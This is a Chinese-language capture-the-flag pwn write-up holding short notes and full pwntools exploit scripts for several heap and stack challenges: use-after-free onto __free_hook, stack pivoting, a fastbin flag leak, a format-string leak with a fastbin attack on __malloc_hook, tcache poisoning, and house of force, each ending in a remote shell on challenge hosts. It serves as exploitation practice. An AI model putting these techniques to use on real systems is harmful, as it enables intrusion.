第一天和第三天直接被爆锤
自己已经尽力了
武汉加油!!!
没看出来是我的
思路就是uaf,将0x80的放入unsortbin后就会拿unsortbin里面的chunk然后不够就会再次申请chunk所以通过uaf将申请chunk指针申请到我们可以写到的chunk里面即可写free_hook为system拿到shell
exp:
#!/usr/bin/python2
from pwn import *
#p=process('./gyctf_2020_document')
p=remote('node3.buuoj.cn',28096)
elf=ELF('./gyctf_2020_document')
libc=elf.libc
def add(name,sex,information):
p.sendlineafter(':','1')
p.sendlineafter('name',name)
p.sendlineafter('sex',sex)
p.sendafter('information',information)
def show(idx):
p.sendlineafter(':','2')
p.sendlineafter(':',str(idx))
def edit(idx,sex,information):
p.sendlineafter(':','3')
p.sendlineafter(':',str(idx))
p.sendlineafter('?',sex)
p.sendafter('information',information)
def delete(idx):
p.sendlineafter(':','4')
p.sendlineafter(':',str(idx))
add('/bin/sh\x00','W','sh'.ljust(0x70,'\x00'))
add('/bin/sh\x00','Y','/bin/sh\x00'.ljust(0x70,'\x00'))
delete(0)
show(0)
libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-88-0x10-libc.sym['__malloc_hook']
log.success('libcbase: '+hex(libcbase))
free_hook=libcbase+libc.sym['__free_hook']
system=libcbase+libc.sym['system']
add('/bin/sh\x00','N','\x15'*0x70)#0
delete(1)
add('/bin/sh\x00','Y','\x16'*0x70)#
payload=p64(0)+p64(0x21)+p64(free_hook-0x10)+p64(0x1)+p64(0)+p64(0x51)+p64(0)*8
edit(0,'Y',payload)
edit(3,'Y',p64(system)+'\x00'*0x68)
p.sendlineafter(':','4')
p.sendlineafter(':',str(2))
p.interactive()
就是基本的栈迁移
exp:
from pwn import *
from LibcSearcher import *
#p=process('./borrowstack')
p=remote('123.56.85.29',3635)
elf=ELF('./borrowstack')
libc=elf.libc
bss=0x000601080
pop_rdi=0x0400702+1
main=0x400626
p.recvuntil('want')
payload='a'*0x58+p64(elf.got['__libc_start_main'])+p64(bss+0x50)+p64(0x00400699)
p.send(payload)
p.recvuntil('!')
bsspayload='\x00'*0x50+p64(bss+0)+p64(pop_rdi)+p64(elf.got['read'])+p64(0x040065B)
p.send(bsspayload)
read=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
libcbase=read-libc.sym['read']
o_g=[0x45216,0x4526a,0xf02a4,0xf1147]
log.success('libcbase: '+hex(libcbase))
one_gadget=libcbase+o_g[2]
system=libcbase+libc.sym['system']
bin_sh=libcbase+libc.search('/bin/sh').next()
sleep(0.2)
payload=p64(one_gadget)*2
p.send(payload)
p.recvuntil('!')
#p.recvuntil(':')
#p.send('icqa553481f05a84e6e69ac62bd46aef')
p.interactive()
通过fastbin 的先进后出的性质泄露flag
from pwn import *
p=remote('123.56.85.29',6484)
#p=process('./excited')
elf=ELF('./excited')
libc=elf.libc
def add(size1,ba,size2,na):
p.sendlineafter(' :','1')
p.sendlineafter(' : ',str(size1))
p.sendafter('ba : ',ba)
p.sendlineafter(' : ',str(size2))
p.sendafter('na : ',na)
def delete(idx):
p.sendlineafter(' :','3')
p.sendlineafter(' : ',str(idx))
def show(idx):
p.sendlineafter(' :','4')
p.sendlineafter(' : ',str(idx))
add(0x10,'aaaa',0x10,'cccc')
add(0x10,'\x11'*4,0x20,'dddd')
#add(0x68)
delete(1)
delete(0)
add(0x20,'\x12'*4,0x20,'dddd')
add(0x10,'\x12'*4,0x10,p64(0x06020A8)*2)
show(1)
p.interactive()
先格式化字符串泄露然后fastbin attack 打malloc_hook
exp:
from pwn import *
#p=process('./interested')
p=remote('123.56.85.29',3041)
elf=ELF('./interested')
libc=elf.libc
def check():
p.sendlineafter(' :','0')
def add(size1,ost,size2,rst):
p.sendlineafter(' :','1')
p.sendlineafter(' : ',str(size1))
p.sendlineafter(' : ',ost)
p.sendlineafter(' : ',str(size2))
p.sendlineafter(' : ',rst)
def edit(idx,ost,rst):
p.sendlineafter(' :','2')
p.sendlineafter(' : ',str(idx))
p.sendlineafter(' : ',ost)
p.sendlineafter(' : ',rst)
def delete(idx):
p.sendlineafter(' :','3')
p.sendlineafter(' : ',str(idx))
def show(idx):
p.sendlineafter(' :','4')
p.sendlineafter(' : ',str(idx))
p.recvuntil(':')
p.send('OreOOrereOOreO%17$p')
check()
p.recvuntil('OreOOrereOOreO')
libcbase=int(p.recv(14),16)-240-libc.sym['__libc_start_main']
o_g=[0x45216,0x4526a,0xf02a4,0xf1147]
malloc_hook=libcbase+libc.sym['__malloc_hook']
one_gadget=libcbase+o_g[3]
log.success('libcbase: '+hex(libcbase))
add(0x20,'\x11',0x30,'\x22')
add(0x68,'\x12',0x20,'\x21')
delete(2)
edit(2,p64(malloc_hook-0x23),p64(malloc_hook-0x23))
add(0x68,'doudou',0x68,'a'*19+p64(one_gadget))
p.sendlineafter(' :','1')
p.sendlineafter(' : ',str(1))
p.interactive()
远程是ubuntu19 但我是用ubuntu18打的都会使用tcachebin 有一个backdoor函数会申请一个0x70大小的chunk和add函数一致首先想到fastbin attack然而发现只能写一次机会还是要钻进libc ,tcache bin的机制加入fastbin 里面有chunk tcachebin 又不为满的状态就会的chunk接到tcache
上面然后有再申请不会将fake的chunk代入到了tcache链表中然后将值写入
exp:
from pwn import *
p=process('./pwn')
#p=remote('123.56.85.29',4205)
elf=ELF('./pwn')
def add(idx):
p.sendlineafter('?','1')
p.sendlineafter('?',str(idx))
def edit(idx,content):
p.sendlineafter('?','2')
p.sendlineafter('?',str(idx))
p.send(content)
def delete(idx):
p.sendlineafter('?','3')
p.sendlineafter('?',str(idx))
def backd():
p.sendlineafter('?','6')
for i in range(8):
add(i)
for i in range(8):
delete(i)
edit(7,p64(0x4040ae))
add(8)
backd()
p.interactive()
house of force 记录一下以前好像没用过~~
利用的条件:
1 自己可以申请的chunk无大小限制
2.能够得到libc地址,堆地址
3 有堆溢出的漏洞(能够改写top_chunk)
如果我们申请的chunk过大就会调用mmap申请(这里chunk结构AMP中的M)申请的地址相对于libc基址是不变的,我们将top改写到最大(改到要比你申请堆块的大小要大)然后申请top指针会更新即可write-anything-anywhere
exp:
from pwn import *
p=process('./pwn')
#p=remote('node3.buuoj.cn',28302)
elf=ELF('./pwn')
libc=elf.libc
def add(size,content):
p.sendlineafter('puts','1')
p.sendlineafter('size',str(size))
p.recvuntil('bin addr ')
address=int(p.recv(14),16)
p.sendafter('content',content)
return address
def show():
p.sendlineafter('puts','2')
lg=lambda addr,data:log.success('%s'%(addr)+hex(data))
heap_mmap=add(20000000,'doudou')
libcbase=heap_mmap+0x1312ff0
malloc_hook=libcbase+libc.sym['__malloc_hook']
one_gadget=libcbase+0x4526a
realloc=libcbase+libc.sym['__libc_realloc']
lg('heap_mmap',heap_mmap)
lg('libcbase: ',libcbase)
heap_addr=add(0x10,'a'*0x10+p64(0)+p64(0xffffffffffffffff))-0x10
top_addr=heap_addr+0x20
lg('top_addr: ',top_addr)
offset=malloc_hook-top_addr-0x30
add(10,'aaaa')
add(0x10,p64(0)+p64(one_gadget)+p64(realloc+4))
show()
p.sendlineafter('puts','1')
p.sendlineafter('size',str(1))
p.interactive()